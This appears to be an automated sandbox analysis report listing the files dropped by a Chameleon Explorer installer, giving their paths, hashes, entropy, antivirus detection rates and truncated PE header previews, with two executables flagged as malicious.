C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15091304
Entropy (8bit):	6.181292047546881
Encrypted:	false
SSDEEP:	98304:aVVZ2l4oeoFVuuaBABjcWvkEPGFta7xEmkLGg79M:aVHoeoFVzvBjbEdGg7u
MD5:	92A3D0847FC622B31F2D0C273A676C0E
SHA1:	E642D694367CC98A8863D87FEC82E4CF940EB48A
SHA-256:	9A9923C08D3FC5937B6ED189E20CF416482A079BC0C898C4ED75329E0EE3AE89
SHA-512:	01D13FD9A0DD52BC2E3F17AF7A999682201C99ECF7218BCA254A4944A483FD1DEC2A3E6D59DEF501A024AD760B849787902ECB55BD33D23FA9651C0A7689CD1C
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d...f=^X..........#.........,E..............@.....................................p.....@..........@............... .......................`...p...@...B...0..\|.......h4................................... ..(....................}..........\|....................text............................. ..`.data....d.......f.................@....bss.........p...........................idata...p...`...r...L..............@....didata.\|...........................@....edata.............................@..@.tls....x................................rdata..m.... .....................@..@.pdata..\|....0.....................@..@.rsrc....B...@...B.................@..@JCLDEBUG.............&..............@..@........................................

C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4644456
Entropy (8bit):	6.624930231136082
Encrypted:	false
SSDEEP:	49152:wo4YSsZdldgNivQrYsMSn6A59SQs3g/9ob2SSHmc9WhbDTOTI98uk5myyxsXFXzT:LJSsZdldgNimB59SQshb2SH9kwEzT
MD5:	5B0AE3FAC33C08145DCA4A9C272EBC34
SHA1:	940F504D835FC254602953495320BB92456177B9
SHA-256:	137723BDD388F6E5A50B7942EFF02F4CC70E6B86D8650A41F9E8956EA1E4DE3B
SHA-512:	015FFC133AD3A6937222BBC057F68B60ABFE22B900B5E7C4E6CA3EC7DC6B09ABAF54B595F00FA9212F370DA8531AF1AC5FC52B39953E1F685E81C66D1EC61F8A
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 2%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....=^X................../.........(./......./...@...........................c.......G...@......@...................`M.......M..H....M...............F.h4....................................M.....................D.M......PM......................text...(X/......Z/................. ..`.itext..D0...p/..2...^/............. ..`.data...\...../......./.............@....bss....<z....0..........................idata...H....M..J...`0.............@....didata......PM.......0.............@....edata.......`M.......0.............@..@.tls....H....pM..........................rdata..].....M.......0.............@..@.rsrc.........M.......0.............@..@JCLDEBUG.D...@W..F...d:.............@..@........................................................

C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	146536
Entropy (8bit):	5.3703743168809845
Encrypted:	false
SSDEEP:	1536:uXYKg56JP/jTk576nGaayaa+9oWjxDgUFUFwdTzuZ/AhR:uHPkUckUFUi1um
MD5:	246AAA95ABDDFD76F9166A2DAA9F2D73
SHA1:	0467FA8567B71F6E3A54D152D9EA77121C627798
SHA-256:	3F6880605A97FFB9B14CD97419A40CB2EA6CEFD616E417FE538031D633FB93B9
SHA-512:	FE2042E9CE22BE3E6E6FE1B324290AEDBC155C55C0EDE63CCF44A0EEA10CE9F626C7553C40B24D917E5A4A8FB70513B33D698F7DEF5091A50831FA0529E8E669
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d....=^X.........."..........h................@......................................................@............... ...............@..\.... ..@.......................h4...p...............................`..(....................".......0.......................text...P........................... ..`.data...............................@....bss.....N...............................idata..@.... ......................@....didata......0......................@....edata..\....@......................@..@.tls.........P...........................rdata..m....`......................@..@.reloc.......p......................@..B.pdata..............................@..@.rsrc...............................@..@....................................@..@

C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll Download File
Process:	C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	805400
Entropy (8bit):	6.529115621464912
Encrypted:	false
SSDEEP:	6144:vDS2QfWotczhwei2LiReVjKRuPJLOigmmy5fdkBAcvqwUvTuVNCz9WjAiL9izdPV:vU0zhW2LvV1JLO4LT75DyGlW4PapdEv
MD5:	DD5CE4D765EDD75EBA6F311E6E0EA10A
SHA1:	9EA7F6516E5AD0755B74463D427055F63ED1A664
SHA-256:	64B7F8F70A7B037D10DA72EAA769078B7E4D1AC8964C5EAE5515D373E816ED6D
SHA-512:	D2782310DF7CC533CC9FFAF5C1903D5BC6A500C3BBE48148C1339FB5DE19C835E4A8C765DA1B80B3744EA231353F76F22BA4E04C78A3D950D7EE291D6EAB2216
Malicious:	false
Yara Hits:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......T.................~........................@.................................b.....@..........................`.......0...........2...............4...p...!...................................................3.......P..0....................text....s.......t.................. ..`.itext...............x.............. ..`.data....).......*..................@....bss.....T...............................idata.......0......................@....didata.0....P......................@....edata.......`......................@..@.reloc...!...p..."..................@..B.rsrc....2.......2..................@..@....................................@..@................................................................................................

C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backup Download File
Process:	C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	805400
Entropy (8bit):	6.529115621464912
Encrypted:	false
SSDEEP:	6144:vDS2QfWotczhwei2LiReVjKRuPJLOigmmy5fdkBAcvqwUvTuVNCz9WjAiL9izdPV:vU0zhW2LvV1JLO4LT75DyGlW4PapdEv
MD5:	DD5CE4D765EDD75EBA6F311E6E0EA10A
SHA1:	9EA7F6516E5AD0755B74463D427055F63ED1A664
SHA-256:	64B7F8F70A7B037D10DA72EAA769078B7E4D1AC8964C5EAE5515D373E816ED6D
SHA-512:	D2782310DF7CC533CC9FFAF5C1903D5BC6A500C3BBE48148C1339FB5DE19C835E4A8C765DA1B80B3744EA231353F76F22BA4E04C78A3D950D7EE291D6EAB2216
Malicious:	false
Yara Hits:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backup, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......T.................~........................@.................................b.....@..........................`.......0...........2...............4...p...!...................................................3.......P..0....................text....s.......t.................. ..`.itext...............x.............. ..`.data....).......*..................@....bss.....T...............................idata.......0......................@....didata.0....P......................@....edata.......`......................@..@.reloc...!...p..."..................@..B.rsrc....2.......2..................@..@....................................@..@................................................................................................

C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_new (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	805400
Entropy (8bit):	6.529115621464912
Encrypted:	false
SSDEEP:	6144:vDS2QfWotczhwei2LiReVjKRuPJLOigmmy5fdkBAcvqwUvTuVNCz9WjAiL9izdPV:vU0zhW2LvV1JLO4LT75DyGlW4PapdEv
MD5:	DD5CE4D765EDD75EBA6F311E6E0EA10A
SHA1:	9EA7F6516E5AD0755B74463D427055F63ED1A664
SHA-256:	64B7F8F70A7B037D10DA72EAA769078B7E4D1AC8964C5EAE5515D373E816ED6D
SHA-512:	D2782310DF7CC533CC9FFAF5C1903D5BC6A500C3BBE48148C1339FB5DE19C835E4A8C765DA1B80B3744EA231353F76F22BA4E04C78A3D950D7EE291D6EAB2216
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......T.................~........................@.................................b.....@..........................`.......0...........2...............4...p...!...................................................3.......P..0....................text....s.......t.................. ..`.itext...............x.............. ..`.data....).......*..................@....bss.....T...............................idata.......0......................@....didata.0....P......................@....edata.......`......................@..@.reloc...!...p..."..................@..B.rsrc....2.......2..................@..@....................................@..@................................................................................................

C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll Download File
Process:	C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1275416
Entropy (8bit):	5.811103517353428
Encrypted:	false
SSDEEP:	12288:MhmMfYVQoycp8xjtxcGnzo9/cKEAdn9bIcxesezMlUJHDD2xx9q8:MY6ZtT+bI+4Mlk2xHq8
MD5:	DE5F74EF4E17B2DC8AD69A3E9B8D22C7
SHA1:	42DF8FEDC56761041BCE47B84BD4E68EE75448D2
SHA-256:	B89A6A57B48BE10103825440D2157F2C4A56E4C6B79AD13F729429CD5393BF32
SHA-512:	515E9B498D8CD9BB03F8D9758E891D073627DFD6FB0B931650A47D6E53722AA6E1CC3CAFF8C0E64F4721AD2ABEF7A81EF4E7B49952D3C8FC325DEB5BBA6B3314
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d......T.........." .........`......`.........@..............................@............@.......................... ...................................2...0..`....B...4... ......................................................P...H............................text............................... ..`.data...`K.......L..................@....bss........@...........................idata..............................@....didata..............F..............@....edata...............H..............@..@.reloc....... .......J..............@..B.pdata..`....0.......L..............@..@.rsrc....2.......2..................@..@.............@.......B..............@..@................................................................................

C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_backup Download File
Process:	C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1275416
Entropy (8bit):	5.811103517353428
Encrypted:	false
SSDEEP:	12288:MhmMfYVQoycp8xjtxcGnzo9/cKEAdn9bIcxesezMlUJHDD2xx9q8:MY6ZtT+bI+4Mlk2xHq8
MD5:	DE5F74EF4E17B2DC8AD69A3E9B8D22C7
SHA1:	42DF8FEDC56761041BCE47B84BD4E68EE75448D2
SHA-256:	B89A6A57B48BE10103825440D2157F2C4A56E4C6B79AD13F729429CD5393BF32
SHA-512:	515E9B498D8CD9BB03F8D9758E891D073627DFD6FB0B931650A47D6E53722AA6E1CC3CAFF8C0E64F4721AD2ABEF7A81EF4E7B49952D3C8FC325DEB5BBA6B3314
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d......T.........." .........`......`.........@..............................@............@.......................... ...................................2...0..`....B...4... ......................................................P...H............................text............................... ..`.data...`K.......L..................@....bss........@...........................idata..............................@....didata..............F..............@....edata...............H..............@..@.reloc....... .......J..............@..B.pdata..`....0.......L..............@..@.rsrc....2.......2..................@..@.............@.......B..............@..@................................................................................

C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_new (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1275416
Entropy (8bit):	5.811103517353428
Encrypted:	false
SSDEEP:	12288:MhmMfYVQoycp8xjtxcGnzo9/cKEAdn9bIcxesezMlUJHDD2xx9q8:MY6ZtT+bI+4Mlk2xHq8
MD5:	DE5F74EF4E17B2DC8AD69A3E9B8D22C7
SHA1:	42DF8FEDC56761041BCE47B84BD4E68EE75448D2
SHA-256:	B89A6A57B48BE10103825440D2157F2C4A56E4C6B79AD13F729429CD5393BF32
SHA-512:	515E9B498D8CD9BB03F8D9758E891D073627DFD6FB0B931650A47D6E53722AA6E1CC3CAFF8C0E64F4721AD2ABEF7A81EF4E7B49952D3C8FC325DEB5BBA6B3314
Malicious:	false
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d......T.........." .........`......`.........@..............................@............@.......................... ...................................2...0..`....B...4... ......................................................P...H............................text............................... ..`.data...`K.......L..................@....bss........@...........................idata..............................@....didata..............F..............@....edata...............H..............@..@.reloc....... .......J..............@..B.pdata..`....0.......L..............@..@.rsrc....2.......2..................@..@.............@.......B..............@..@................................................................................

C:\Program Files (x86)\Chameleon Explorer\Folder.dll Download File
Process:	C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	768032
Entropy (8bit):	6.537086415352977
Encrypted:	false
SSDEEP:	6144:wo6ws4L29BHDesvpczEoPAc+qyH7JRHf4Z2R5oTf+y4vWUA692IAiL9+P/c3uyDq:wo6c2zHtxJQP22mNjweEV+mwar
MD5:	FB76F4F533203E40CE30612A47171F94
SHA1:	304BA296C77A93DDB033D52578FCC147397DB981
SHA-256:	3DE05F18FFE9FDA589A45EA539A464E58A30F70D59D71444B018064CF831C4A6
SHA-512:	A416A6D6EFBBD69209E1867F12B9D1D11B21160F6DFE07C510B43112C22C317F805C67DD9402744A6C7E1541F6B3A061C49942FE28FA70F74AEA670BA9C71995
Malicious:	false
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....V..........................................P..........................@......v...........................................L........(.............. 4...........................................................................................text............................... ..`.itext.............................. ..`.data....(.......*..................@....bss....$T...@...........................idata..L............"..............@....didata..............6..............@....edata...............:..............@..@.rdata..E............<..............@..@.reloc...............>..............@..B.rsrc....(.......(...\..............@..@.............@......................@..@........................................................

C:\Program Files (x86)\Chameleon Explorer\Folder.dll_backup Download File
Process:	C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	768032
Entropy (8bit):	6.537086415352977
Encrypted:	false
SSDEEP:	6144:wo6ws4L29BHDesvpczEoPAc+qyH7JRHf4Z2R5oTf+y4vWUA692IAiL9+P/c3uyDq:wo6c2zHtxJQP22mNjweEV+mwar
MD5:	FB76F4F533203E40CE30612A47171F94
SHA1:	304BA296C77A93DDB033D52578FCC147397DB981
SHA-256:	3DE05F18FFE9FDA589A45EA539A464E58A30F70D59D71444B018064CF831C4A6
SHA-512:	A416A6D6EFBBD69209E1867F12B9D1D11B21160F6DFE07C510B43112C22C317F805C67DD9402744A6C7E1541F6B3A061C49942FE28FA70F74AEA670BA9C71995
Malicious:	false
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....V..........................................P..........................@......v...........................................L........(.............. 4...........................................................................................text............................... ..`.itext.............................. ..`.data....(.......*..................@....bss....$T...@...........................idata..L............"..............@....didata..............6..............@....edata...............:..............@..@.rdata..E............<..............@..@.reloc...............>..............@..B.rsrc....(.......(...\..............@..@.............@......................@..@........................................................

C:\Program Files (x86)\Chameleon Explorer\Folder.dll_new (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	768032
Entropy (8bit):	6.537086415352977
Encrypted:	false
SSDEEP:	6144:wo6ws4L29BHDesvpczEoPAc+qyH7JRHf4Z2R5oTf+y4vWUA692IAiL9+P/c3uyDq:wo6c2zHtxJQP22mNjweEV+mwar
MD5:	FB76F4F533203E40CE30612A47171F94
SHA1:	304BA296C77A93DDB033D52578FCC147397DB981
SHA-256:	3DE05F18FFE9FDA589A45EA539A464E58A30F70D59D71444B018064CF831C4A6
SHA-512:	A416A6D6EFBBD69209E1867F12B9D1D11B21160F6DFE07C510B43112C22C317F805C67DD9402744A6C7E1541F6B3A061C49942FE28FA70F74AEA670BA9C71995
Malicious:	false
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....V..........................................P..........................@......v...........................................L........(.............. 4...........................................................................................text............................... ..`.itext.............................. ..`.data....(.......*..................@....bss....$T...@...........................idata..L............"..............@....didata..............6..............@....edata...............:..............@..@.rdata..E............<..............@..@.reloc...............>..............@..B.rsrc....(.......(...\..............@..@.............@......................@..@........................................................

C:\Program Files (x86)\Chameleon Explorer\Folder64.dll Download File
Process:	C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1226272
Entropy (8bit):	5.8428341731794005
Encrypted:	false
SSDEEP:	12288:OXHZ/e0zlt8tEWmk37f72c4zHmIa0zydJXgvtd5/oTWisqhwjtmcre:OXHF1zlWmk3rq+grGAjre
MD5:	96F92C8368C1E922692F399DB96DA1EB
SHA1:	1A91D68F04256EF3BC1022BEB616BA65271BD914
SHA-256:	161408B86EED7C4D9A5882AA00DF3F8765ED28FA4FD9AAB2C9B3DCEADBD527F9
SHA-512:	B3D3FB2D78FE2DF864F0E07A8BC1610EE9D65251957E0495A34C1631895293590E0FCA965EC9DEB160F48A4E09A2FEABD3BFF6FB9A0C22888A941E308DE39D14
Malicious:	false
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d.....V.........." .....,...R.......:........P.....................................\................................ ...............`.......0..$....P...(.............. 4...........................................................7.......P.......................text....+.......,.................. ..`.data...HF...@...H...0..............@....bss....................................idata..$....0.......x..............@....didata......P......................@....edata.......`......................@..@.rdata..E....p......................@..@.reloc..............................@..B.pdata..............................@..@.rsrc....(...P...(...Z..............@..@....................................@..@........................................

C:\Program Files (x86)\Chameleon Explorer\Folder64.dll_backup Download File
Process:	C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1226272
Entropy (8bit):	5.8428341731794005
Encrypted:	false
SSDEEP:	12288:OXHZ/e0zlt8tEWmk37f72c4zHmIa0zydJXgvtd5/oTWisqhwjtmcre:OXHF1zlWmk3rq+grGAjre
MD5:	96F92C8368C1E922692F399DB96DA1EB
SHA1:	1A91D68F04256EF3BC1022BEB616BA65271BD914
SHA-256:	161408B86EED7C4D9A5882AA00DF3F8765ED28FA4FD9AAB2C9B3DCEADBD527F9
SHA-512:	B3D3FB2D78FE2DF864F0E07A8BC1610EE9D65251957E0495A34C1631895293590E0FCA965EC9DEB160F48A4E09A2FEABD3BFF6FB9A0C22888A941E308DE39D14
Malicious:	false
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d.....V.........." .....,...R.......:........P.....................................\................................ ...............`.......0..$....P...(.............. 4...........................................................7.......P.......................text....+.......,.................. ..`.data...HF...@...H...0..............@....bss....................................idata..$....0.......x..............@....didata......P......................@....edata.......`......................@..@.rdata..E....p......................@..@.reloc..............................@..B.pdata..............................@..@.rsrc....(...P...(...Z..............@..@....................................@..@........................................

C:\Program Files (x86)\Chameleon Explorer\Folder64.dll_new (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1226272
Entropy (8bit):	5.8428341731794005
Encrypted:	false
SSDEEP:	12288:OXHZ/e0zlt8tEWmk37f72c4zHmIa0zydJXgvtd5/oTWisqhwjtmcre:OXHF1zlWmk3rq+grGAjre
MD5:	96F92C8368C1E922692F399DB96DA1EB
SHA1:	1A91D68F04256EF3BC1022BEB616BA65271BD914
SHA-256:	161408B86EED7C4D9A5882AA00DF3F8765ED28FA4FD9AAB2C9B3DCEADBD527F9
SHA-512:	B3D3FB2D78FE2DF864F0E07A8BC1610EE9D65251957E0495A34C1631895293590E0FCA965EC9DEB160F48A4E09A2FEABD3BFF6FB9A0C22888A941E308DE39D14
Malicious:	false
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d.....V.........." .....,...R.......:........P.....................................\................................ ...............`.......0..$....P...(.............. 4...........................................................7.......P.......................text....+.......,.................. ..`.data...HF...@...H...0..............@....bss....................................idata..$....0.......x..............@....didata......P......................@....edata.......`......................@..@.rdata..E....p......................@..@.reloc..............................@..B.pdata..............................@..@.rsrc....(...P...(...Z..............@..@....................................@..@........................................

C:\Program Files (x86)\Chameleon Explorer\is-0AE3R.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	768032
Entropy (8bit):	6.537086415352977
Encrypted:	false
SSDEEP:	6144:wo6ws4L29BHDesvpczEoPAc+qyH7JRHf4Z2R5oTf+y4vWUA692IAiL9+P/c3uyDq:wo6c2zHtxJQP22mNjweEV+mwar
MD5:	FB76F4F533203E40CE30612A47171F94
SHA1:	304BA296C77A93DDB033D52578FCC147397DB981
SHA-256:	3DE05F18FFE9FDA589A45EA539A464E58A30F70D59D71444B018064CF831C4A6
SHA-512:	A416A6D6EFBBD69209E1867F12B9D1D11B21160F6DFE07C510B43112C22C317F805C67DD9402744A6C7E1541F6B3A061C49942FE28FA70F74AEA670BA9C71995
Malicious:	false
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....V..........................................P..........................@......v...........................................L........(.............. 4...........................................................................................text............................... ..`.itext.............................. ..`.data....(.......*..................@....bss....$T...@...........................idata..L............"..............@....didata..............6..............@....edata...............:..............@..@.rdata..E............<..............@..@.reloc...............>..............@..B.rsrc....(.......(...\..............@..@.............@......................@..@........................................................

C:\Program Files (x86)\Chameleon Explorer\is-BP5O1.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1275416
Entropy (8bit):	5.811103517353428
Encrypted:	false
SSDEEP:	12288:MhmMfYVQoycp8xjtxcGnzo9/cKEAdn9bIcxesezMlUJHDD2xx9q8:MY6ZtT+bI+4Mlk2xHq8
MD5:	DE5F74EF4E17B2DC8AD69A3E9B8D22C7
SHA1:	42DF8FEDC56761041BCE47B84BD4E68EE75448D2
SHA-256:	B89A6A57B48BE10103825440D2157F2C4A56E4C6B79AD13F729429CD5393BF32
SHA-512:	515E9B498D8CD9BB03F8D9758E891D073627DFD6FB0B931650A47D6E53722AA6E1CC3CAFF8C0E64F4721AD2ABEF7A81EF4E7B49952D3C8FC325DEB5BBA6B3314
Malicious:	false
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d......T.........." .........`......`.........@..............................@............@.......................... ...................................2...0..`....B...4... ......................................................P...H............................text............................... ..`.data...`K.......L..................@....bss........@...........................idata..............................@....didata..............F..............@....edata...............H..............@..@.reloc....... .......J..............@..B.pdata..`....0.......L..............@..@.rsrc....2.......2..................@..@.............@.......B..............@..@................................................................................

C:\Program Files (x86)\Chameleon Explorer\is-FAUA3.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4644456
Entropy (8bit):	6.624930231136082
Encrypted:	false
SSDEEP:	49152:wo4YSsZdldgNivQrYsMSn6A59SQs3g/9ob2SSHmc9WhbDTOTI98uk5myyxsXFXzT:LJSsZdldgNimB59SQshb2SH9kwEzT
MD5:	5B0AE3FAC33C08145DCA4A9C272EBC34
SHA1:	940F504D835FC254602953495320BB92456177B9
SHA-256:	137723BDD388F6E5A50B7942EFF02F4CC70E6B86D8650A41F9E8956EA1E4DE3B
SHA-512:	015FFC133AD3A6937222BBC057F68B60ABFE22B900B5E7C4E6CA3EC7DC6B09ABAF54B595F00FA9212F370DA8531AF1AC5FC52B39953E1F685E81C66D1EC61F8A
Malicious:	false
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....=^X................../.........(./......./...@...........................c.......G...@......@...................`M.......M..H....M...............F.h4....................................M.....................D.M......PM......................text...(X/......Z/................. ..`.itext..D0...p/..2...^/............. ..`.data...\...../......./.............@....bss....<z....0..........................idata...H....M..J...`0.............@....didata......PM.......0.............@....edata.......`M.......0.............@..@.tls....H....pM..........................rdata..].....M.......0.............@..@.rsrc.........M.......0.............@..@JCLDEBUG.D...@W..F...d:.............@..@........................................................

C:\Program Files (x86)\Chameleon Explorer\is-M2PIB.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	146536
Entropy (8bit):	5.3703743168809845
Encrypted:	false
SSDEEP:	1536:uXYKg56JP/jTk576nGaayaa+9oWjxDgUFUFwdTzuZ/AhR:uHPkUckUFUi1um
MD5:	246AAA95ABDDFD76F9166A2DAA9F2D73
SHA1:	0467FA8567B71F6E3A54D152D9EA77121C627798
SHA-256:	3F6880605A97FFB9B14CD97419A40CB2EA6CEFD616E417FE538031D633FB93B9
SHA-512:	FE2042E9CE22BE3E6E6FE1B324290AEDBC155C55C0EDE63CCF44A0EEA10CE9F626C7553C40B24D917E5A4A8FB70513B33D698F7DEF5091A50831FA0529E8E669
Malicious:	false
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d....=^X.........."..........h................@......................................................@............... ...............@..\.... ..@.......................h4...p...............................`..(....................".......0.......................text...P........................... ..`.data...............................@....bss.....N...............................idata..@.... ......................@....didata......0......................@....edata..\....@......................@..@.tls.........P...........................rdata..m....`......................@..@.reloc.......p......................@..B.pdata..............................@..@.rsrc...............................@..@....................................@..@

C:\Program Files (x86)\Chameleon Explorer\is-MIQ4J.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1226272
Entropy (8bit):	5.8428341731794005
Encrypted:	false
SSDEEP:	12288:OXHZ/e0zlt8tEWmk37f72c4zHmIa0zydJXgvtd5/oTWisqhwjtmcre:OXHF1zlWmk3rq+grGAjre
MD5:	96F92C8368C1E922692F399DB96DA1EB
SHA1:	1A91D68F04256EF3BC1022BEB616BA65271BD914
SHA-256:	161408B86EED7C4D9A5882AA00DF3F8765ED28FA4FD9AAB2C9B3DCEADBD527F9
SHA-512:	B3D3FB2D78FE2DF864F0E07A8BC1610EE9D65251957E0495A34C1631895293590E0FCA965EC9DEB160F48A4E09A2FEABD3BFF6FB9A0C22888A941E308DE39D14
Malicious:	false
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d.....V.........." .....,...R.......:........P.....................................\................................ ...............`.......0..$....P...(.............. 4...........................................................7.......P.......................text....+.......,.................. ..`.data...HF...@...H...0..............@....bss....................................idata..$....0.......x..............@....didata......P......................@....edata.......`......................@..@.rdata..E....p......................@..@.reloc..............................@..B.pdata..............................@..@.rsrc....(...P...(...Z..............@..@....................................@..@........................................

C:\Program Files (x86)\Chameleon Explorer\is-NOOMK.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	805400
Entropy (8bit):	6.529115621464912
Encrypted:	false
SSDEEP:	6144:vDS2QfWotczhwei2LiReVjKRuPJLOigmmy5fdkBAcvqwUvTuVNCz9WjAiL9izdPV:vU0zhW2LvV1JLO4LT75DyGlW4PapdEv
MD5:	DD5CE4D765EDD75EBA6F311E6E0EA10A
SHA1:	9EA7F6516E5AD0755B74463D427055F63ED1A664
SHA-256:	64B7F8F70A7B037D10DA72EAA769078B7E4D1AC8964C5EAE5515D373E816ED6D
SHA-512:	D2782310DF7CC533CC9FFAF5C1903D5BC6A500C3BBE48148C1339FB5DE19C835E4A8C765DA1B80B3744EA231353F76F22BA4E04C78A3D950D7EE291D6EAB2216
Malicious:	false
